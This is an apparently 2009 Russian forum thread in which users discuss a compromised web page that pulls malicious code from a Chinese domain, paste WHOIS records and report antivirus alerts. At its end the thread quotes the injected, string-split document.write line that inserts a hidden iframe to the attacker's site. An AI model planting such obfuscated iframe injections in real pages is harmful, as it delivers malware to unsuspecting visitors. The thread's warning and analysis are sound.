Нет–нет, что Вы, не объясняйте! Всё кристально ясно!
Скорее всего это XSS
2th: в чём вы меня подозреваете?
xSs:
ripcord: кокаинум!
xSs: вы — китаец!
Вот это да!
coverman:
ZorgeZorge: слева есть просвет. Туда и иди…
Объяснять, что это значит, надо?
Ага. Для меня, гуманитария, можно?
Ага. Для меня, гуманитария, можно?
Antardhan: При загрузке страницы динамически генерится код, который получает данные с сервера, расположенного в Китае и пытается его "показать" на странице. В коде загружается java–applet. Что он делает — я не проверял. :)
Извините. Мне объяснять надо и то, что объяснено уже! Надо.
И, в этом уверен, что он делает, я сам проверить тоже не смогу.
Пост открывать пока боюсь. Жду. Надо!
И, в этом уверен, что он делает, я сам проверить тоже не смогу.
Пост открывать пока боюсь. Жду. Надо!
aloha: не переживайте. ничего он не делает. там просто "page not found". во всяком случае пока. но вместо отсутствующей страницы может появиться вполне себе что–то действующее.
по поводу "надо объяснять" — почитайте securitylab.ru годика хотя бы три — вы поймете, что существует 1001 способ проникновения на ваш компьютер из сети, и есть 3 простых правила, чтобы этого не произошло.
1. don't use IE
2. go to trusted sites
3. always monitor your PC activity
по поводу "надо объяснять" — почитайте securitylab.ru годика хотя бы три — вы поймете, что существует 1001 способ проникновения на ваш компьютер из сети, и есть 3 простых правила, чтобы этого не произошло.
1. don't use IE
2. go to trusted sites
3. always monitor your PC activity
e5: спасибо. По наивности верил, что инвайт на дёти избавит меня от 3х перечисленных опасностей и необходимости 3 года читать секьюритиЛаб. Ушел читать. (:
да! и как там don't use ХРОМ?
да! и как там don't use ХРОМ?
e5: странно, регулярно юзаю ие, проблем нет. Наверное надо вовремя ставить апдейты и не запускать что попало? :)
tLS: "Регулярно юзаю ИЕ, зависимости никакой" — гордо сказал tLS; а тем временем его машина в гигантском ботнете тихо занималась рассылкой писем и ддосом.
e5: мне мне кажется второе правило распространяется уже и на Firefox. Лично я пользуюсь уже некоторое время Хромом, но мне это не нравится ;((
Мама_Чоли: на ФФ есть noscript — включаешь его на trusted sites, по остальным смело ходишь без js.
Мама_Чоли: как ты юзаешь хром, с его 2,5 настройками?
MaxMVP: Блин, про две знал, а что там за 0,5–ая настройка?
e5: Там уже что–то было на java.
Antardhan: NickPo, получается, китайский хакер.
еще один все понял
Штази?
сайтик свеженький
Domain Name: tolzcoolz.cn
ROID: 20091025s10001s27213205–cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email: abuseemaildhcp@gmail.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009–10–25 14:33
Expiration Date: 2010–10–25 14:33
Registrant Search:
"Real Host LTD" owns about 168 other domains
Reverse IP:
12 other sites hosted on this server.
Analizersys.cn
Blogau.cn
Blogkz.cn
zaders.cn
Whois information on 210.51.166.247:
inetnum: 210.51.160.0 — 210.51.175.255
netname: CNC–BJ–IDC2
country: CN
descr: Beijing YiZhuang IDC of China Netcom
admin–c: CH140–AP
tech–c: TJ35–AP
status: ALLOCATED NON–PORTABLE
changed: cncipaddr@china–netcom.com 20040414
mnt–by: MAINT–CN–ZM28
mnt–lower: MAINT–CN–BJIDC
source: APNIC
route: 210.51.0.0/16
descr: CNC Group CncNet
country: CN
origin: AS9929
mnt–by: MAINT–CNCGROUP–RR
changed: abuse@cnc–noc.net 20060330
source: APNIC
role: CNCIDC hostmaster
address: No.1,Beihuan Donglu,BDA,Beijing,China
country: CN
phone: +8610 6787 5599
fax–no: +8610 6787 8624
e–mail: cncipaddr@china–netcom.com
trouble: send spam and abuse reports to tech–group@china–netcom.com
trouble: Please include detailed information and times in UTC
admin–c: TJ35–AP
tech–c: TC254–AP
nic–hdl: Ch140–AP
notify: cncipaddr@china–netcom.com
mnt–by: MAINT–CN–ZM28
changed: hm–changed@apnic.net 20040226
source: APNIC
person: Tao Jiang
nic–hdl: TJ35–AP
e–mail: bjidc–ipaddr@cnc.cn
address: No.1,Beihuan Donglu, Beijing Economic
address: –TechnologicalDevelopment Area,Beijing
phone: +8610–67878534
fax–no: +8610–67878538
country: CN
changed: jiangtao@cnc.cn 20080221
mnt–by: MAINT–CN–BJIDC
source: APNIC
Domain Name: tolzcoolz.cn
ROID: 20091025s10001s27213205–cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email: abuseemaildhcp@gmail.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009–10–25 14:33
Expiration Date: 2010–10–25 14:33
Registrant Search:
"Real Host LTD" owns about 168 other domains
Reverse IP:
12 other sites hosted on this server.
Analizersys.cn
Blogau.cn
Blogkz.cn
zaders.cn
Whois information on 210.51.166.247:
inetnum: 210.51.160.0 — 210.51.175.255
netname: CNC–BJ–IDC2
country: CN
descr: Beijing YiZhuang IDC of China Netcom
admin–c: CH140–AP
tech–c: TJ35–AP
status: ALLOCATED NON–PORTABLE
changed: cncipaddr@china–netcom.com 20040414
mnt–by: MAINT–CN–ZM28
mnt–lower: MAINT–CN–BJIDC
source: APNIC
route: 210.51.0.0/16
descr: CNC Group CncNet
country: CN
origin: AS9929
mnt–by: MAINT–CNCGROUP–RR
changed: abuse@cnc–noc.net 20060330
source: APNIC
role: CNCIDC hostmaster
address: No.1,Beihuan Donglu,BDA,Beijing,China
country: CN
phone: +8610 6787 5599
fax–no: +8610 6787 8624
e–mail: cncipaddr@china–netcom.com
trouble: send spam and abuse reports to tech–group@china–netcom.com
trouble: Please include detailed information and times in UTC
admin–c: TJ35–AP
tech–c: TC254–AP
nic–hdl: Ch140–AP
notify: cncipaddr@china–netcom.com
mnt–by: MAINT–CN–ZM28
changed: hm–changed@apnic.net 20040226
source: APNIC
person: Tao Jiang
nic–hdl: TJ35–AP
e–mail: bjidc–ipaddr@cnc.cn
address: No.1,Beihuan Donglu, Beijing Economic
address: –TechnologicalDevelopment Area,Beijing
phone: +8610–67878534
fax–no: +8610–67878538
country: CN
changed: jiangtao@cnc.cn 20080221
mnt–by: MAINT–CN–BJIDC
source: APNIC
Prosto_Ivan: Пеерееведи! © "Москва слезам не верит"
luminiscent: А Вы умеете писать на китайском? На тот адресок нужно писать по–китайски.
Prosto_Ivan: не умею, но с удовольствием возьму пару уроков, ибо телефон у меня из поднебесной и все порталы форумы с софтом и прочим на их родном, да и программы частично. А читать всё это дело в гугло–переводе это психомазохизм, но иначе пока никак не получается. :(
при открытии страницы UAC ругнулся что сайт хочет запустить некий "Installer6", а Forefront тут же послал этот инсталлер в пень, радостно гыгыкнув.
я туда уже зашел (FF 3.5.5). ни Nod32, ни ZoneAlarm ничего плохого на это не сказали.
marcelos: У меня Нод разорвал соединение при попытке запуска чего–то похожего на Троян
This is a private computer system. It is for authorized use only. Users (authorized or unauthorized) have no explicit or implicit expectation of privacy.
Any or all uses of this system and all files on this system may be intercepted, monitored, recorded, copied, audited, inspected, and disclosed to authorized site and law enforcement personnel, as well as authorized officials of other agencies or organizations, both domestic and foreign. By using this system, the user consents to such interception, monitoring, recording, copying, auditing, inspection, and disclosure.
написано на сайте хостера
в общих словах — "вы не можете проверить свою почту потому что у сотрудника фсб который читает вашу почту перекур."
Any or all uses of this system and all files on this system may be intercepted, monitored, recorded, copied, audited, inspected, and disclosed to authorized site and law enforcement personnel, as well as authorized officials of other agencies or organizations, both domestic and foreign. By using this system, the user consents to such interception, monitoring, recording, copying, auditing, inspection, and disclosure.
написано на сайте хостера
в общих словах — "вы не можете проверить свою почту потому что у сотрудника фсб который читает вашу почту перекур."
Я вот им письмо написал об этом на online expert ru 55 минут назад. До сих пор не убрали. Впадлу обновлять свой большой и тяжелый сайт. может. «Апдейты у нас выливаются только по четвергам, после дождя»
там уже 404
Дык пофиксили уже…
Желающие могут посмотреть его HTML–исходник и найти строчку: document.write("<"+"i"+"f"+"rame"+" sr"+"c='ht"+"tp://"+"tolzcoolz"+".cn"+"/ sv/index.php?s=4017985176938a491016668fc 08ef81a'"+" style='d"+"isplay:no"+"ne;'>");
Объяснять, что это значит, надо?
в твиттер